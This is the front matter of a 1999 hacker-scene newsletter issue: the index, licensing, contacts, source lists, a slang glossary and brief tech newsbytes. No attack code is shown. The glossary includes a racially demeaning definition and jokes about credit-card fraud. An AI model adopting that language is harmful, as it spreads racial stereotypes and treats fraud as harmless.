[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 33 Volume 1 1999 Sept 12th 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== _ ___ ___ _ ___ | | | \ \ / / \ | |__ __ ___ __/ _ \ _ __ _ __ _____ _____ | |_| |\ \ /\ / / _ \ | '_ \ / _` \ \/ / | | | '__| '_ \ / _ \ \ /\ / / __| | _ | \ V V / ___ \ _| | | | (_| |> <| |_| | | _| | | | __/\ V V /\__ \ |_| |_| \_/\_/_/ \_(_)_| |_|\__,_/_/\_\\___/|_|(_)_| |_|\___| \_/\_/ |___/ Well http://welcome.to/HWA.hax0r.news/ is back up and working!! I shoulda mentioned it in #32 but what can I say? I fucked up and left the message there from the week before, boy is my face red. ;^, - Ed =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= The Hacker's Ethic Sadly, due to the traditional ignorance and sensationalizing of the mass media, the once-noble term hacker has become a perjorative. Among true computer people, being called a hacker is a compliment. One of the traits of the true hacker is a profoundly antibureaucratic and democratic spirit. That spirit is best exemplified by the Hacker's Ethic. This ethic was best formulated by Steven Levy in his 1984 book Hackers: Heroes of the Computer Revolution. Its tenets are as follows: 1 - Access to computers should be unlimited and total. 2 - All information should be free. 3 - Mistrust authority - promote decentralization. 4 - Hackers should be judged by their hacking not bogus criteria such as degrees, age, race, or position. 5 - You create art and beauty on a computer, 6 - Computers can change your life for the better. The Internet as a whole reflects this ethic. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= A Comment on FORMATTING: I received an email recently about the formatting of this newsletter, suggesting that it be formatted to 75 columns in the past I've endevoured to format all text to 80 cols except for articles and site statements and urls which are posted verbatim, I've decided to continue with this method unless more people complain, the zine is best viewed in 1024x768 mode with UEDIT.... - Ed =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= New mirror sites http://www.sysbreakers.com/hwa http://www.attrition.org/hosted/hwa/ http://www.ducktank.net/hwa/issues.html. http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwazine.cjb.net/ http://www.hackunlimited.com/files/secu/papers/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ * http://hwa.hax0r.news.8m.com/ * http://www.fortunecity.com/skyscraper/feature/103/ * Crappy free sites but they offer 20M & I need the space... HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth and airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! tnx guys. http://www.csoft.net/~hwa http://www.digitalgeeks.com/hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. *DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #33 =-----------------------------------------------------------------------= We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #33 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. NSA Key Found in Windows ........................................ 04.0 .. Online Gambling is not Secure ................................... 05.0 .. Zyklon Pleads Guilty ............................................ 06.0 .. Mitnick Transferred to Lompoc Federal Prison .................... 07.0 .. C-Span Web Site Defaced ......................................... 08.0 .. killsentry.c a Port Sentry killer by Vortexia.................... 09.0 .. W. Richard Stevens dead at 48.................................... 10.0 .. New Palm Pilot RedBox for Canada is Released .................... 11.0 .. Windows2000test Suffers Attack .................................. 12.0 .. Flex-LM Security Breached ....................................... 13.0 .. Customers of Numerous ISPs Victims of Fraud ..................... 14.0 .. Air Force Asks to Preserve 'Panther Den' ........................ 15.0 .. $19.6 Million Awarded to Create DOD IDS ......................... 16.0 .. UK Plans Super Group to Crack Crypto ............................ 17.0 .. Nationwide Identity Database Plans Started in 1997 .............. 18.0 .. Game Boy Advance to Connect to the Internet ..................... 19.0 .. South African Security Industry goes Loco over Portscan.......... 20.0 .. Owner of ZANet IRC Network runs into trouble..................... 21.0 .. Global Hell Expose .............................................. 22.0 .. "NSA" key in Microsoft CryptoAPI ................................ 23.0 .. 9999 - Hey! That's today! ....................................... 24.0 .. US Chinese Embassy Defaced ...................................... 25.0 .. Scottish Executive Site Defaced - After Warning ................. 26.0 .. Cholera Outbreak Expected ....................................... 27.0 .. Web Email Vulnerable? ........................................... 28.0 .. Cyber Terrorism - US Biggest Threat ............................. 29.0 .. Philippine Gov Scared of Cyber Terrorists ....................... 30.0 .. US Sen. Warns of Cyber Attack Along with Y2K ,................... 31.0 .. JPEG Steals ICQ Passwords ....................................... 32.0 .. BackDoor in Windows Found ....................................... 33.0 .. HERF Gun Demonstrated at InfowarCon ............................. 34.0 .. GNU Launches Free Encryption Tool ............................... 35.0 .. Fringe Goes Offline ............................................. 36.0 .. IACSP Defaced ................................................... 37.0 .. RUSSIAN HACKERS REPORTEDLY ACCESSED US MILITARY SECRETS.......... 38.0 .. NET PRIVACY STUDY INCLUDED IN RD BILL............................ 39.0 .. SCENE RELATIONS.................................................. 40.0 .. L0PHT HEAVY INDUSTRIES PROFILED.................................. 41.0 .. SUMMIT TALKS FOCUS ON E-COMMERCE SAFETY.......................... 42.0 .. SECURITY SOLUTIONS............................................... 43.0 .. HTTP://WWW.KKK.COM HIJACKED...................................... 44.0 .. MS ORDERS SECURITY AUDIT AFTER HOTMAIL BREACH.................... 45.0 .. EMBASSY CRACKER MAY BE PLAYING GOVERNMENTS' GAME................. 46.0 .. CYBER-CORPS TO PROTECT FEDERAL COMPUTERS......................... 47.0 .. WINDOWS2000 BETA 3 BACKDOOR...................................... 48.0 .. AMERICAN EXPRESS AND E-COMMERCE.................................. 49.0 .. BUSINESS TOO TRUSTING OF E-MAIL.................................. 50.0 .. SCOTTISH HACKERS DECLARE WAR ON WALES............................ 51.0 .. V-ONE AND RED HAT IN SECURITY PACT............................... 52.0 .. HACKERS DEFACE HACKER'S SITE..................................... 53.0 .. How to penetrate Universities in less than an hour............... 54.0 .. Biometrics, busting hackers by sense of smell................... 55.0 .. HP Security Bulletin: Vulnerability in rpc.cmsd.................. 56.0 .. Microsoft Bulletin: "Fragmented IGMP Packet" Vulnerability....... 57.0 .. Microsoft Bulletin: ActiveX Script Vulnerability................. 58.0 .. Trend Micro: W97M_60thSKEPTIC virus.............................. 59.0 .. The story of MAX the AI (part 2, final episode).................. 60.0 .. AOLwatch......................................................... =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: POSTPONED til further notice, place: TBA.. ................. Ha.Ha .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities) - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp* If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/ NewsTrolls .(daily news ).........http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ *DOWN* News/Humour site+ ................http://www.innerpulse.com News/Techie news site.............http://www.slashdot.org +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=hack http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://ech0.cjb.net ech0 Security http://axon.jccc.net/hir/ Hackers Information Report http://net-security.org Net Security http://www.403-security.org Daily news and security related site Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black eentity ...( '' '' ): Currently active/IRC+ man in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Qubik ............................: United Kingdom D----Y ...........................: USA/world media HWA members ......................: World Media Past Foreign Correspondants (currently inactive or presumed dead) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck, where the fuck, when the fuck etc .. *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick kewl sites: + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.packetstorm.harvard.edu/ ******* DOWN (THANKS JP) ****** + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ STOCKS GOING HIGH From Help Net Security http://www.net-security.org/ by BHZ, Saturday 11th September 1999 on 1:46 am CET Red Hat (www.redhat.com) stock are going high into the sky. Frank Batten Jr., Red Hat's largest investor and the has seen his 15 million shares in the company rised from $1 billion to enormous $1.84 billion (current stock price today is $122.81). ++ LINUX TODAY MAILING LIST From Help Net Security http://www.net-security.org/ by BHZ, Friday 10th September 1999 on 3:25 am CET Linux Today (www.linuxtoday.com) announced new mailing list today. If you subscribe you will get a newsletter, which will cover linux news and alerts, directly in your mailbox. http://linuxtoday.com/createaccount.php3. ++ UNIX-VIRUS MAILING LIST From Help Net Security http://www.net-security.org/ by BHZ, Wednesday 8th September 1999 on 5:37 pm CET Interested in Unix viruses? Join the unix-virus mailing list which was created to discuss virus in the unix environment. If you want to subscribe send a message with "subscribe unix-virus" in the body of the message to majordomo@virus.beergrave.net. ++ Still no sign of http://www.securify.com/packetstorm/ .... ++ LUCENT'S HIGH-SPEED 'STINGER' (BUS. 7:30 am) http://www.wired.com/news/news/email/explode-infobeat/business/story/21609.html The company says its new product will allow ISPs and local phone companies to offer DSL service without compromising voice-service quality. Says one analyst: "The 800-pound gorilla is entering the business." ++ CZECHS CHARGE TO CASH IN ON NET (CULT. 3:00 am) http://www.wired.com/news/news/email/explode-infobeat/culture/story/21584.html The Czech Republic is ever ... so ... slowly entering the technology age. Netrepreneurs take some flak, but they push on undaunted. Steve Kettmann reports from Prague. ++ RED, HOT, AND HYPERLINKED (BUS. 3:00 am) http://www.wired.com/news/news/email/explode-infobeat/business/story/21596.html With a bilingual version of WebTV and the possibility of building an ambitious fiber-optic link, the island of Cuba may soon be fully connected. By Vito Echevarria. ++ SUN TRIES NET APPLIANCE, AGAIN (BUS. 7:35 am) http://www.wired.com/news/news/email/explode-infobeat/business/story/21633.html In the world of dumbed-down computers, they don't get any dumber than the Sun Ray. And that's the idea, Sun says: Let the network do the work. ++ CONNECTING ASIA (BUS. 7:35 am) http://www.wired.com/news/news/email/explode-infobeat/business/story/21632.html Global Crossing, Microsoft, and Softbank say an 11,000-mile, US$1.3 billion telecom network will bring broadband services to Asia. Also: Concentric is buying a British ISP.... Lycos acquiring Quote.com for $78.3 million.... And more. ++ SILICON VALLEY GOES SOUTH (CULT. 3:00 am) http://www.wired.com/news/news/email/explode-infobeat/culture/story/21630.html Hollywood decidely goes tech, and it's got the conference to prove it: the first annual Digital Coast Conference. Michael Stroud reports from Los Angeles. Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read 